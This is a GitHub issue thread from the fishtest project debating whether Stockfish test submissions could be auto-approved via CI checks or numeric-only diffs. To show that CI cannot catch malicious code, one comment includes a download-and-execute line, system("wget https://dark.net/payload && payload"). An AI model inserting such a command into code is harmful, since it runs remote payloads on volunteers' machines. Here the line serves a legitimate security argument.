fishtest
fishtest copied to clipboard
Proposal for an auto-approve feature
I noticed that since we introduced the last changes https://github.com/glinscott/fishtest/pull/239 concerning autofill of the benches, all devs started actually writing the bench of the branch in the commit message since they saw an advantage with it.
In short, by giving a reward to use good patterns, they immediately use the better pattern.
I was thinking, maybe we can allow auto-approve, using the following design. Are eligible to autoapproval those patches which satisfy following criteria:
- there are only changes in
.h
or.cpp
files - the branch passes a Travis CI build on the committer repository
- it has [0,5] bounds or [0,4] with only changes in numerics
Every 15 min we then automatically scan the pending tests and check whether there is a corresponding passing Travis CI build using their API and approve those eligible.
This would give a reward for connecting the repository to Travis, give a reward to submit non [-3,1] patches, and get some workload off the approvers.
Any thoughts?
I thought the purpose of the approval process was to prevent any malicious code from being executed on the worker machines. It would be irresponsible of us to expose our contributors to this security hole.
it has [0,5] bounds or [0,4] with only changes in numerics
In practice only [0,4] tests will only have changes to numeric constants. For those changes I do not see the reason/advantage of Travis builds. Auto-approving these tests makes sense to me, because introducing real malicious code with those changes is not possible. DOS attacks, eg allocating enormous amounts of memory, etc., are possible, but I would trust such an automated test more then the current human source code inspection. @vondele What are your thoughts?
As an example of a [0,4] test that would fail a travis build see the recent: http://tests.stockfishchess.org/tests/view/5adf2bfc0ebc590331056b48 (look at commit comments).
In addition to the security aspect, I like the policy of having all patches 'approved'. At least one other human has seen the idea, can comment on it, can correct, etc. There have been countless times where I was inspired by or learned something from a patch I approved.
I also don't see the need to differentiate [-3,1] from [0,N] patches... both classes are needed to keep the code in good shape.
That the framework is sometimes going idle with some patches pending is, a pity but not terrible.
Ok, I try to summarize:
- from the security point of view, there is no risk in auto-approving parameter tunes
- there are some corner cases in which even parameter tunes could fail on CI
- from the security point of view, there could be some risk in auto-approving functional patches, but automatic test should be more efficient in catching malicious code
- from the community point of view, it looks sensible to encourage people in reviewing functional patches
Taking everything together, it looks to me that we only have advantages if we implement is auto-approval for patches with [0,4] bounds, after checking that the diff to master only contains numerics. For the rest there is still a need for discussion.
Do you agree?
Proper parameter tunes only have changes to numeric constants. Anyone wanting to execute malicious code will obviously not abide by this.
Therefore I propose to autoapprove after checking the diff
Concerning automatic tests catching security issues .... no way. You can add system("wget https://dark.net/payload && payload") to the code, and it would still pass travis.
I see. I just found out that
git diff master --word-diff-regex='[a-z]' | grep \]\{
or something similar should make possible to identify the changelists containing only parameter tunes. Just as thought...
Auto-approve can be done on passing stc tests, since they are already approved once by human it is redundant to do it again. Maybe make it an option turned on by default on stc tests, "auto submit ltc in case stc pass" so tester can also opt out for other reasons. Maybe same for spsa tests, auto submit with updated variables to stc tests after it finishes then ltc after that etc..
I don't see auto-approve on STC tests. Even parameter tunes need a second look. Some people can simply troll with useless tests.
However a checkbox auto approve LTC is interesting (checked by default). When framework is empty, we often see aprovers start LTC tests on behalf of other people, but most people prefers to see the tests under their name, it makes their test follow-up or history searching easier. (easier also for other people to follow the test history)
Another case to consider is that anyone (approver or not) can reschedule someone else test. STC auto-approval would have to catch this (or would have to remove permit to reschedule by non-approvers)
Another common instance is user submit test A with some code changes and params. Test B or C will be exactly the same, except for some small param changes. This could be a good candidate to auto-approval for test B or C
I would agree with an optional (default on) auto-LTC-reschedule-without-approval for passed STC tests...
@vondele It would be nice if someone implements an auto-LTC for passed STC tests.